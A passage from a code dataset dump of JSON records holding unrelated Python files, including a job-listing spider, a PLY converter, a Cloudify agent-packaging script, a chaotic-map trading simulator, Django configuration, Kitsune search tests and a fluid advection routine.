self.start_url, job.get('job_id', \"\")\n )\n meta = {\n 'title': job.get('job_title', \"\"),\n 'location': [job.get('city', \"\"), job.get('state_abbrev', \"\")],\n 'zip_code': job.get('postal_code', \"\"),\n \"jobid\": str(job.get('job_id', \"\"))\n }\n yield Request(url, meta=meta, callback=self.parse_job_callback())\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('location', response.meta['location'])\n loader.add_value('zip_code', response.meta['zip_code'])\n loader.add_value(\n 'referencenumber', response.meta['jobid'],\n Prefix(\"%s-%s-\" % (self.name, self.subdomain))\n )\n loader.add_xpath(\n \"description\",\n \"//div[input[@id='btnApply']]/following-sibling::div[1]\",\n RemoveEmptyTags()\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/ourcareerpages.py","file_name":"ourcareerpages.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3449335","text":"import math\n\ndef IsPrime(n):\n if(n == 2):\n return True\n elif(n % 2 == 0 or n < 2):\n return False\n length = math.floor(math.sqrt(n) / 2) + 1\n ls = [True] * length\n ls[0] = False\n for i in range(length):\n if(ls[i] == False):\n continue\n else:\n if(n % (2 * i + 1) == 0):\n return False\n else:\n for l in [x for x in range(1, math.floor((2 * length - 1) / (2 * i + 1)) + 1) if x % 2 != 0]:\n ls[math.floor(i * l + (l - 1) / 2)] = False\n return True\n","sub_path":"dockerized-gists/8366855/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"590765460","text":"\n\nfrom xai.brain.wordbase.nouns._nativity import _NATIVITY\n\n#calss header\nclass _NATIVITIES(_NATIVITY, ):\n\tdef __init__(self,): \n\t\t_NATIVITY.__init__(self)\n\t\tself.name = \"NATIVITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"nativity\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_nativities.py","file_name":"_nativities.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279202761","text":"import os, argparse\nimport numpy as np\nfrom plyfile import PlyData\nfrom tqdm import tqdm\n\n#def parse_args():\n# parser = argparse.ArgumentParser()\n\n# parser.add_argument('--all', action='store_true', default=True, help='prepare all scenes')\n# # parser.add_argument('--input', type=str, default='/home/oscar/media/frustum/object/training/velodyne/001047.ply')\n# # parser.add_argument('--output', type=str, default='/home/oscar/media/frustum/object/training/001047.bin')\n\n# args = parser.parse_args()\n# return args\n\ndef read_ply(ply_path):\n plydata = PlyData.read(ply_path)\n vertex = plydata.elements[0].data\n points = np.asarray(vertex.tolist())\n return points\n\nif __name__ == '__main__':\n #args = parse_args()\n\n #if args.all:\n input_path = \"/mnt/gpid08/users/ian.riera/kitti/pointcloud_ply/\"\n output_path = \"/mnt/gpid08/users/ian.riera/kitti/prepared_ply/\"\n #output_path = '/mnt/gpid08/users/ian.riera/media/openpcdet/training/velodyne'\n\n\n for subdir, dirs, files in os.walk(input_path):\n for file in tqdm(files):\n if os.path.exists(output_path+file.split('.')[0]+\".txt\"):\n print(\"EXIST\")\n else:\n print(\"DOESN'T\")\n points = read_ply(os.path.join(subdir, file))\n\n #points[:, :3] /= 1000\n #points[:, 3] -= np.min(points[:, 3])\n #points[:, 3] /= np.max(points[:, 3])\n\n #rot_x = -np.pi / 2\n #Rx = np.array([[1, 0, 0],\n # [0, np.cos(rot_x), -np.sin(rot_x)],\n # [0, np.sin(rot_x), np.cos(rot_x)]])\n\n #rot_z = -np.pi / 2\n #Rz = np.array([[np.cos(rot_z), -np.sin(rot_z), 0],\n # [np.sin(rot_z), np.cos(rot_z), 0],\n # [0, 0, 1]])\n\n #R = Rz @ Rx\n\n ## add a -1.1 in that position if you want to lower the height of the point cloud (z coordinate), not\n ## necessary\n ## H = np.row_stack((np.column_stack((R, [0, 0, -1.1])), [0, 0, 0, 1]))\n\n #H = np.row_stack((np.column_stack((R, [0, 0, 0])), [0, 0, 0, 1]))\n filename = file.split('.ply')[0]\n for idx, point in tqdm(enumerate(points)):\n #new_point = H @ np.array([*point[:3], 1])\n #new_point = new_point[:3] / new_point[3]\n \n points[idx][:3] = point[:3]\n\n with open(output_path+filename+'.txt', 'a') as f:\n f.write(\"{} {} {}\".format(points[idx][0],points[idx][1],points[idx][2])+'\\n')\n print(\"END\")","sub_path":"utils/prepare_ply.py","file_name":"prepare_ply.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175700967","text":"#########\n# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport os\nimport platform\n\nfrom agent_packager import packager\nfrom cloudify import ctx\nfrom cloudify_agent.tests.resources import get_resource\nfrom cloudify.utils import LocalCommandRunner\nfrom cloudify.exceptions import NonRecoverableError\n\n\nconfig = {\n 'cloudify_agent_module': ctx.node.properties['cloudify_agent_module'],\n 'requirements_file': ctx.node.properties.get('requirements_file')\n}\n\nresource_base = ctx.node.properties['resource_base']\nfile_server_port = ctx.node.properties['file_server_port']\n\n\n# This should be integrated into packager\n# For now, this is the best place\ndef create_windows_installer():\n runner = LocalCommandRunner()\n wheelhouse = get_resource('winpackage/source/wheels')\n\n pip_cmd = 'pip wheel --wheel-dir {wheel_dir} --requirement {req_file}'.\\\n format(wheel_dir=wheelhouse, req_file=config['requirements_file'])\n\n ctx.logger.info('Building wheels into: {0}'.format(wheelhouse))\n runner.run(pip_cmd)\n\n pip_cmd = 'pip wheel --find-links {wheel_dir} --wheel-dir {wheel_dir} ' \\\n '{repo_url}'.format(wheel_dir=wheelhouse,\n repo_url=config['cloudify_agent_module'])\n runner.run(pip_cmd)\n\n iscc_cmd = 'C:\\\\Program Files (x86)\\\\Inno Setup 5\\\\iscc.exe {0}'\\\n .format(get_resource(os.path.join('winpackage', 'create.iss')))\n os.environ['VERSION'] = '0'\n os.environ['iscc_output'] = os.getcwd()\n runner.run(iscc_cmd)\n\nctx.logger.info('Changing directory into {0}'.format(resource_base))\noriginal = os.getcwd()\ntry:\n ctx.logger.info('Creating Agent Package')\n os.chdir(resource_base)\n if platform.system() == 'Linux':\n packager.create(config=config,\n config_file=None,\n force=False,\n verbose=False)\n distname, _, distid = platform.dist()\n package_url = 'http://localhost:{0}/{1}-{2}-agent.tar.gz' \\\n .format(file_server_port, distname, distid)\n elif platform.system() == 'Windows':\n create_windows_installer()\n package_url = 'http://localhost:{0}/cloudify_agent_0.exe' \\\n .format(file_server_port)\n else:\n raise NonRecoverableError('Platform not supported: {0}'\n .format(platform.system()))\nfinally:\n os.chdir(original)\n\nctx.logger.info('Package created successfully: {0}'.format(package_url))\nctx.logger.info('Setting runtime properties')\nctx.instance.runtime_properties['package_url'] = package_url\n","sub_path":"cloudify_agent/tests/resources/blueprints/agent-from-package/scripts/create-package.py","file_name":"create-package.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"174244912","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\ndef compute_yorke(c, r_c,hist_c):\n\tc[0] = c[0]*r_c[0]*(1.-c[0])\n\thist_c[0].append(c[0])\n\tc[1] = c[1]*r_c[1]*(1.-c[1])\n\thist_c[1].append(c[1])\n\tc[2] = c[2]*r_c[2]*(1.-c[2])\n\thist_c[2].append(c[2])\n\ndef compute_may_feigenbaum(c, r_c,hist_c):\n\tc_pow = np.power(c,2.)\n\tc[0] = r_c[0]*(c[0]-c_pow[0])\n\thist_c[0].append(c[0])\n\tc[1] = r_c[1]*(c[1]-c_pow[1])\n\thist_c[1].append(c[1])\n\tc[2] = r_c[2]*(c[2]-c_pow[2])\n\thist_c[2].append(c[2])\n\ndef compute_feigenbaum(c, r_c,hist_c):\n\tc[0] = r_c[0]*np.sin(np.pi*c[0])\n\thist_c[0].append(c[0])\n\tc[1] = r_c[1]*np.sin(np.pi*c[1])\n\thist_c[1].append(c[1])\n\tc[2] = r_c[2]*np.sin(np.pi*c[2])\n\thist_c[2].append(c[2])\n\n\t\ndef print_sim_report(sum, r_c,shares,cash,price):\n\tprint('total investment:'+str(sum))\n\tprint('r_hold:'+str(r_c[0]))\n\tprint('r_buy:'+str(r_c[1]))\n\tprint('r_sell:'+str(r_c[2]))\n\tprint('num of shares:'+str(shares))\n\tprint('available cash:'+str(cash))\n\tprint('total:'+str((shares*price+cash)))\n\ndef plot(data,hist_c,r_c,hist_cash,hist_shares,num_hold,num_buy,num_sell):\n\tplt.figure(1)\n\tx = range(len(data))\n\tplt.subplot(3,3,1)\n\tline1, = plt.plot(x[0:40],hist_c[0][0:40],'r',label='hist hold')\n\tplt.legend([line1], ['hist hold, r='+str(r_c[0])])\n\tplt.subplot(3,3,2)\n\tline2, = plt.plot(x[0:40],hist_c[1][0:40],'g',label='hist buy')\n\tplt.legend([line2], [ 'hist buy, r='+str(r_c[1])])\n\tplt.subplot(3,3,3)\n\tline3, = plt.plot(x[0:40],hist_c[2][0:40],'b',label='hist sell')\n\tplt.legend([line3], ['hist sell, r='+str(r_c[2])])\n\tplt.subplot(3,3,4)\n\tline4, = plt.plot(x,hist_cash,'g',label='cash')\n\tplt.legend([line4], ['cash'])\n\tplt.subplot(3,3,5)\n\tline5, = plt.plot(x,hist_shares,'r',label='shares')\n\tplt.legend([line5], ['shares'])\n\tplt.subplot(3,3,6)\n\tline6, = plt.plot(x,data,'y',label='spy')\n\tplt.legend([line6], ['spy'])\n\tplt.subplot(3,3,7)\n\tline7 = plt.bar([1,2,3],[num_hold,num_buy,num_sell],label='hold,buy,sell operations')\n\tplt.legend([line7], ['hold,buy,sell operations'])\n\tplt.show()\n\ndef read_etf(etf_name):\n\tdata = []\n\tdates = []\n\tnum_rows = 0\n\t#nacitame data\n\twith open(etf_name,'r') as csvfile:\n\t\tspamreader = csv.reader(csvfile,delimiter=',')\n\t\tfor row in spamreader:\n\t\t\tnum_rows+=1\n\t\t\t#if int(row[0]) > 1483228800:\n\t\t\tdata.append(float(row[1]))\n\t\t\tdates.append(str(row[0]))\n\t\n\treturn data,num_rows, dates\n\t\ndef compute_choice(choice_min=0.,choice_max=1.,isConstant=False):\n\tif(isConstant):\n\t\treturn choice_max\n\t\n\treturn np.random.uniform(choice_min,choice_max)\n\t\ndef main():\n\t#ticket = 'btc_data'\n\tticket = 'SPY'\n\t\n\tdata,l,dates = read_etf('c:\\\\downloaded_data\\\\USD\\\\'+ticket+'.csv')\n\t\t\t\n\t#zakladne vlastnosti hold, buy, sell\t\n\tc = [0.01,0.01,0.01]\t\t\n\t#grow factor pre hold, buy, sell\n\t#best spy\n\t#r_c = [3.7248023104723726, 3.7434059826819586, 3.6937761867181664]\n\tr_c=[3.792741215699916, 3.961690242868475, 3.69609636766504]\n\t#best spy single investment\n\t#r_c=[0.007496274346508,3.758124406721808,3.604305873682242]\n\t#r_c=[3.781934538211035, 3.867263993546563, 3.6020015059038997]\n\t#best ewa\n\t#r_c=[3.673787568009235,3.6054382787045705,3.7991922674927654]\n\t#best ews\n\t#r_c=[3.8220189381860346,3.9584157485372193,3.622339608548732]\n\t#semi-best btc\n\t#r_c = [1044.0665024044329,3.8342336595366913,3.718616826123904]\n\t#semi-etfgrowth-full\n\t#r_c = [3.6881401636784386, 3.9533624620185392, 3.675141142971656]\n\t#last etfgrowth full goodd\n\t#r_c=[2.7132956491891904,3.7724358341968154, 4.050632771766222]\t\n\t#r_c = [3.9615792089203103, 3.9814282553862337, 3.513512900295451]\n\t\n\t#zakladny cash\n\tcash = 300.\n\t#referecna suma\n\tsum = cash\n\n\t#pociatocny pocet share spy\n\tshares = 0\n\n\t#inicializacia historie vlastnosti, shares, cash a poctu operacii\n\thist_c = [[] for i in range(len(data))]\n\thist_shares = []\n\thist_cash = []\n\tnum_hold = 0\n\tnum_buy=0\n\tnum_sell=0\n\n\tactions = []\n\t\n\tfor i in range(20):\n\t\t#inicializuj growth factor\n\t\tcompute_yorke(c,r_c,hist_c)\n\t\t#compute_may_feigenbaum(c,r_c,hist_c)\n\t\t#compute_feigenbaum(c,r_c,hist_c)\n\t\n\tprint('total number of rows:'+str(l))\n\tprint('num of data:'+str(len(data)))\n\tfor preheat in range(l - len(data)):\n\t\tcompute_yorke(c,r_c,hist_c)\n\t\n\t\n\t#zakladny loop pre jeden vyber parametrov\n\tfor i in range(len(data)):\n\t\tprice = data[i]\n\t\t#uloz do historie shares a hodnotu aktiv\n\t\thist_shares.append(shares)\n\t\thist_cash.append(cash+price*shares)\n\n\t\t#vypocitaj growth factor\n\t\tcompute_yorke(c,r_c,hist_c)\n\t\t#compute_may_feigenbaum(c,r_c,hist_c)\n\t\t#compute_feigenbaum(c,r_c,hist_c)\n\t\t\n\t\t#kazdy mesiac (30dni) investujeme 300\n\t\tif(i % 30 == 0):\n\t\t\tcash+=300.\n\t\t\tsum+=300.\n\t\t\n\t\t#nahodny vyber\n\t\tchoice = compute_choice(choice_max=0.9, isConstant=True)\n\t\taction_performed = False\n\t\t#hold akcia\n\t\tif(c[0] > choice):\n\t\t\tnum_hold+=1\n\t\t\taction_performed = True\n\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t\tcontinue\n\t\t#buy akcia\n\t\tif(c[1] > choice):\n\t\t\tnum_buy+=1\n\t\t\tnum_shares = cash/price\n\t\t\tcash -= price*num_shares\n\t\t\tshares += num_shares\n\t\t\taction_performed = True\n\t\t\tif num_shares > 0:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'B', price*shares+cash,shares])\n\t\t\telse:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t#sell akcia\n\t\tif(c[2] > choice):\n\t\t\tnum_sell+=1\n\t\t\tcash += price*shares\n\t\t\tif shares > 0:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'S', cash,0])\n\t\t\telse:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t\tshares=0\n\t\t\taction_performed = True\n\t\t\n\t\t#no-action = hold action\n\t\tif(not action_performed):\n\t\t\tnum_hold+=1\n\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t\t\n\t#ak je max vacsi nez limit, skonci\n\tprint_sim_report(sum, r_c,shares,cash,data[len(data)-1])\n\tplot(data,hist_c,r_c,hist_cash,hist_shares,num_hold,num_buy,num_sell)\n\t\n\twith open(ticket+'_training_data.csv','w',newline='') as csvfile:\n\t\twriter = csv.writer(csvfile,delimiter=',')\n\t\tfor action in actions:\n\t\t\twriter.writerow(action)\n\t\n\t\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py_code/etf_growth_sample_gen.py","file_name":"etf_growth_sample_gen.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"491010618","text":"from django.conf.urls import patterns, url\nfrom .views import prov_list, prov_detail, prov_create, prov_edit, home, master_create, all_json_countries\n\nurlpatterns = patterns('',\n\turl(r'^home/$', home, name='home'),\n url(r'^prov_list/$', prov_list, name='prov_list'),\n url(r'^prov_detail/(?P\\d+)/$', prov_detail, name='prov_detail'),\n url(r'^prov_create/$', prov_create, name='prov_create'),\n url(r'^prov_edit/(?P\\d+)/$', prov_edit, name='prov_edit'),\n url(r'^master_create/$', master_create, name='master_create'),\n\n # This url is used by ajax to create the location's dependent drop down menu.\n url(r'^continent/(?P[^%20]*[-\\w]+)/all_json_countries/$', all_json_countries, name='all_json_countries'),\n)\n","sub_path":"proverbs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"329481066","text":"from django.contrib import admin\nfrom app.models import Trip\nfrom app.models import Reservation\nfrom app.models import Client\n\n\n@admin.register(Client)\nclass ClientAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'email',\n 'is_driver',\n )\n\n\n@admin.register(Trip)\nclass TripAdmin(admin.ModelAdmin):\n list_display = (\n 'travel_date',\n 'quotas',\n 'driver',\n 'city_from',\n 'city_to',\n 'price',\n )\n\n\n@admin.register(Reservation)\nclass ReservationAdmin(admin.ModelAdmin):\n list_display = (\n 'trip',\n 'user',\n 'requested_quotas',\n )\n\n\n\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"329413823","text":"from smartway.api.python.exceptions import ErrorGeneral\nfrom smartway.configs.variables import TablaPrincipal\nfrom models import (\n Dato, \n DatoPosicion, \n VariableGeneral, \n ConfigVariable,\n ConfigAlarma,\n)\n\n#########################################################################\n# MOVER A DONDE VAYAN LAS VARIABLES GENERALES\n#########################################################################\nfrom smartway.api.python import obtenerVariablesSoportadasVehiculo\n\n\ndef obtener_variables_soportadas(vehiculo, diccionarioPlano=False):\n '''\n Retorna una lista con las variables soportadas por el vehiculo\n '''\n # Configuracion de variables especiales\n return obtenerVariablesSoportadasVehiculo(vehiculo, diccionarioPlano)\n\n\n#########################################################################\n# FIN\n#########################################################################\ndef crear_configuraciones_privadas(vehiculo):\n '''\n Se generan todas las configuraciones de variables por defecto que hay que\n poner para inicializar en un vehiculo\n '''\n # Configuracion de variables especiales\n for var in VariableGeneral.objects.filter(publica=False):\n cfg = ConfigVariable.get_or_create(variable=var, vehiculo=vehiculo)\n cfg.tracking = False\n cfg.activa = True\n cfg.save()\n ConfigAlarma.get_or_create(configuracion=cfg)\n\n\ndef obtener_datos_vehiculo(vehiculo, idVariable, desde, hasta, errores=False):\n '''\n Se generan todas las configuraciones de variables por defecto que hay que\n poner para inicializar en un vehiculo\n '''\n retorno = None\n if errores:\n # Retorna variables con codigos de error\n retorno = Dato.objects.filter(vehiculo=vehiculo, variable__id=idVariable,\n timestamp__gte=desde, timestamp__lte=hasta).order_by('timestamp')\n else:\n # Retorna variables solo ok\n retorno = Dato.objects.filter(vehiculo=vehiculo, variable__id=idVariable,\n timestamp__gte=desde, timestamp__lte=hasta,\n codigo_error=0).order_by('timestamp')\n\n\n return retorno\n\ndef obtener_posiciones_vehiculo(vehiculo, desde, hasta):\n retorno = None\n \n # Retorna variables con codigos de error\n retorno = DatoPosicion.objects.filter(vehiculo=vehiculo, \n timestamp__gte=desde, timestamp__lte=hasta).order_by(\"timestamp\")\n\n return retorno\n\n\n\ndef obtener_datos_variables(vehiculo, desde, hasta, variables):\n retorno = {}\n lista_variables = TablaPrincipal().obtenerListaTablaPrincipal()\n variables_soportadas = obtener_variables_soportadas(vehiculo, True)\n keys_lista_variables = lista_variables.keys()\n\n for var in variables:\n # Si la variable esta en el sistema\n if var in keys_lista_variables:\n interseccion = list(set(lista_variables[var].ids_variables).intersection(set(variables_soportadas)))\n if interseccion:\n retorno[var] = obtener_datos_vehiculo(vehiculo, interseccion[0], desde, hasta)\n retorno[var + \"_min\"] = lista_variables[var].minimo\n retorno[var + \"_max\"] = lista_variables[var].maximo\n retorno[var + \"_vt\"] = lista_variables[var].tiempo_validez\n\n else:\n retorno[var] = []\n\n if (\"Latitud\" in retorno.keys() and not len(retorno['Latitud'])) \\\n or (\"Longitud\" in retorno.keys() and not len(retorno['Longitud'])):\n\n# print \"NO Lat o leng \", vehiculo\n \n if \"Latitud\" in retorno.keys():\n retorno.pop(\"Latitud\")\n if \"Longitud\" in retorno.keys():\n retorno.pop(\"Longitud\")\n\n retorno[\"Posicion\"] = obtener_posiciones_vehiculo(vehiculo, desde, hasta)\n retorno[\"Posicion_min\"] = ''\n retorno[\"Posicion_max\"] = ''\n retorno[\"Posicion_vt\"] = lista_variables[\"Posicion\"].tiempo_validez\n #print vehiculo\n #try:\n # retorno[\"Posicion\"] = obtener_posiciones_vehiculo(vehiculo, desde, hasta)\n # print \"x\"\n #except Exception:\n # pass\n #retorno[\"Posicion\"] = obtener_posiciones_vehiculo(vehiculo, desde, hasta)\n #\n #prendido = Dato.objects.filter(vehiculo=vehiculo, variable__id=1, timestamp__gte=desde, timestamp__lte=hasta, codigo_error=0).order_by('timestamp')\n #\n #apagado = []\n #for on in prendido:\n # #print on.timestamp , on.valor\n # if on.valor == \"0\":\n # apagado.append(on.timestamp)\n #con_apagados = 0\n #for dato in retorno[\"Posicion\"]:\n # if dato.timestamp in apagado:\n # #print dato.timestamp , dato , \"-------APAGADO\"\n # con_apagados += 1\n # #else:\n # # print dato.timestamp , dato\n #\n #flujo = Dato.objects.filter(vehiculo=vehiculo, variable__id=815, timestamp__gte=desde, timestamp__lte=hasta, codigo_error=0).order_by('timestamp')\n #print\n #no_flujo = 0\n #for flu in flujo:\n # if flu.valor < '10':\n # no_flujo += 1\n #\n #print len(flujo) , \" +++++ \",no_flujo\n #\n #print len(prendido)\n #print \"apagados \" , con_apagados\n #print \"matricula \" , vehiculo.matricula\n #print \"smartway \" , len(retorno[\"Posicion\"])\n #try:\n # print len(retorno[\"Latitud\"]), len(retorno[\"Longitud\"])\n #except Exception:\n # print \"no hay lat y long\"\n #print \"--------------------------\"\n return retorno\n","sub_path":"smartway/ui/data/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88883526","text":"import json\n\nfrom nose.tools import eq_\n\nfrom kitsune.forums.tests import post, thread\nfrom kitsune.questions.tests import question\nfrom kitsune.search.tests.test_es import ElasticTestCase\nfrom kitsune.sumo.urlresolvers import reverse\nfrom kitsune.wiki.tests import document, revision\n\n\nclass SearchApiTests(ElasticTestCase):\n\n def test_wiki_search(self):\n \"\"\"Test searching for wiki documents.\"\"\"\n doc = document(\n title=u'help plz',\n category=10,\n save=True,\n )\n revision(document=doc, is_approved=True, save=True)\n\n doc = document(\n title=u'I can get no firefox',\n category=10,\n save=True,\n )\n revision(document=doc, is_approved=True, save=True)\n\n doc = document(\n title=u'firefox help',\n category=10,\n save=True,\n )\n revision(document=doc, is_approved=True, save=True)\n\n self.refresh()\n\n url = reverse('coolsearch.search_wiki')\n\n # All results.\n response = self.client.get(url, {})\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 3)\n\n # Testing query filter.\n response = self.client.get(url, {\n 'query': 'help',\n })\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 2)\n\n response = self.client.get(url, {\n 'query': 'firefox',\n })\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 2)\n\n def test_forum_search(self):\n \"\"\"Test searching for forum threads.\"\"\"\n thread1 = thread(title=u'crash', save=True)\n post(thread=thread1, save=True)\n\n self.refresh()\n\n response = self.client.get(reverse('coolsearch.search_forum'), {\n 'query': 'crash',\n })\n\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 1)\n\n def test_question_search(self):\n \"\"\"Tests searching for questions.\"\"\"\n ques = question(title=u'audio', save=True)\n ques.tags.add(u'Windows 7')\n\n self.refresh()\n\n response = self.client.get(reverse('coolsearch.search_question'), {\n 'query': 'audio',\n })\n\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 1)\n","sub_path":"kitsune/coolsearch/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"521302592","text":"\"\"\"\nComputes advection fluxes for a given variable, with various advection schemes.\n\nFollowing schemes are supported: \"upwind\", \"minmod\", \"koren\" and \"superbee\"\n\"\"\"\n\n# Standard Python modules\nfrom pyns.standard import *\n\n# PyNS modules\nfrom pyns.constants import *\nfrom pyns.operators import *\n\n# =============================================================================\ndef advection(rho, phi, uvwf, dxyz, dt, lim_name):\n# -----------------------------------------------------------------------------\n \"\"\"\n Args:\n rho: Three-dimensional matrix holding physical property in advection\n term (density or density times capacity ...) for cells.\n phi: Unknown transported by advection (from \"create_unknown\").\n uvwf: Tuple with three staggered velocity components (where each\n component is created with \"create_unknown\" function.\n dxyz: Tuple holding cell dimensions in \"x\", \"y\" and \"z\" directions.\n Each cell dimension is a three-dimensional matrix.\n dt: Time step.\n lim_name: Limiter name.\n Can be: \"upwind\", \"minmod\", \"koren\" and \"superbee\"\n\n Returns:\n Three-dimensional matrix with advection term.\n \"\"\"\n\n res = phi.val.shape\n nx, ny, nz = res\n\n # Unpack tuples\n uf, vf, wf = uvwf\n dx, dy, dz = dxyz\n\n pos = phi.pos\n\n # Pre-compute geometrical quantities\n sx = dy * dz\n sy = dx * dz\n sz = dx * dy\n\n # ------------------------------------------------\n # Specific for cell-centered transported variable\n # ------------------------------------------------\n if pos == C:\n\n # Facial values of physical properties including boundary cells\n rho_x_fac = cat_x((rho[:1,:,:], avg_x(rho), rho[-1:,:,:])) \n rho_y_fac = cat_y((rho[:,:1,:], avg_y(rho), rho[:,-1:,:])) \n rho_z_fac = cat_z((rho[:,:,:1], avg_z(rho), rho[:,:,-1:])) \n\n # Facial values of areas including boundary cells\n a_x_fac = cat_x((sx[:1,:,:], avg_x(sx), sx[-1:,:,:]))\n a_y_fac = cat_y((sy[:,:1,:], avg_y(sy), sy[:,-1:,:]))\n a_z_fac = cat_z((sz[:,:,:1], avg_z(sz), sz[:,:,-1:]))\n\n # Distance between cell centers, defined at faces including boundaries\n # MODIFY FOR PERIODIC!!!\n del_x = cat_x((dx[:1,:,:]*0.5, avg_x(dx), dx[-1:,:,:]*0.5))\n del_y = cat_y((dy[:,:1,:]*0.5, avg_y(dy), dy[:,-1:,:]*0.5))\n del_z = cat_z((dz[:,:,:1]*0.5, avg_z(dz), dz[:,:,-1:]*0.5))\n\n # Velocities defined at faces including boundaries\n # TAKE CARE YOU HAVE FRESH VALUES FOR PERIODIC\n u_fac = cat_x((uf.bnd[W].val, uf.val, uf.bnd[E].val))\n v_fac = cat_y((vf.bnd[S].val, vf.val, vf.bnd[N].val))\n w_fac = cat_z((wf.bnd[B].val, wf.val, wf.bnd[T].val))\n \n # -----------------------------------------------------------\n # Specific for transported variable staggered in x direction\n # -----------------------------------------------------------\n if pos == X:\n\n # Facial values of physical properties including boundary cells\n rho_x_fac = rho \n rho_nod_y = avg_x(avg_y(rho)) \n rho_y_fac = cat_y((rho_nod_y[:, :1,:], rho_nod_y, rho_nod_y[:,-1:,:])) \n rho_nod_z = avg_x(avg_z(rho)) \n rho_z_fac = cat_z((rho_nod_z[:,:, :1], rho_nod_z, rho_nod_z[:,:,-1:])) \n\n # Facial values of areas including boundary cells\n a_x_fac = sx\n a_y_fac = cat_y((avg_x(sy[:,:1,:]),\n avg_x(avg_y(sy)),\n avg_x(sy[:,-1:,:])))\n a_z_fac = cat_z((avg_x(sz[:,:,:1]),\n avg_x(avg_z(sz)),\n avg_x(sz[:,:,-1:])))\n\n # Distance between cell centers, defined at faces including boundaries\n # MODIFY FOR PERIODIC\n del_x = dx[:,:,:]\n del_y = avg_x(cat_y((dy[:,:1,:]*0.5, avg_y(dy), dy[:,-1:,:]*0.5)))\n del_z = avg_x(cat_z((dz[:,:,:1]*0.5, avg_z(dz), dz[:,:,-1:]*0.5)))\n\n # Velocities defined at faces including boundaries\n # TAKE CARE YOU HAVE FRESH VALUES FOR PERIODIC\n u_fac = cat_x((uf.bnd[W].val, avg_x(uf.val), uf.bnd[E].val)) \n v_fac = avg_x(cat_y((vf.bnd[S].val, vf.val, vf.bnd[N].val)))\n w_fac = avg_x(cat_z((wf.bnd[B].val, wf.val, wf.bnd[T].val))) \n\n # -----------------------------------------------------------\n # Specific for transported variable staggered in y direction\n # -----------------------------------------------------------\n if pos == Y:\n\n # Facial values of physical properties including boundary cells\n rho_nod_x = avg_y(avg_x(rho) )\n rho_x_fac = cat_x((rho_nod_x[ :1,:,:], rho_nod_x, rho_nod_x[-1:,:,:]))\n rho_y_fac = rho\n rho_nod_z = avg_y(avg_z(rho) )\n rho_z_fac = cat_z((rho_nod_z[:,:, :1], rho_nod_z, rho_nod_z[:,:,-1:]))\n\n # Facial values of areas including boundary cells\n a_x_fac = cat_x((avg_y(sx[:1,:,:]),\n avg_y(avg_x(sx)),\n avg_y(sx[-1:,:,:])))\n a_y_fac = sy\n a_z_fac = cat_z((avg_y(sz[:,:,:1]),\n avg_y(avg_z(sz)),\n avg_y(sz[:,:,-1:])))\n\n # Distance between cell centers, defined at faces including boundaries\n # MODIFY FOR PERIODIC\n del_x = avg_y(cat_x((dx[:1,:,:]*0.5, avg_x(dx), dx[-1:,:,:]*0.5)))\n del_y = dy[:,:,:]\n del_z = avg_y(cat_z((dz[:,:,:1]*0.5, avg_z(dz), dz[:,:,-1:]*0.5)))\n\n # Velocities defined at faces including boundaries\n # TAKE CARE YOU 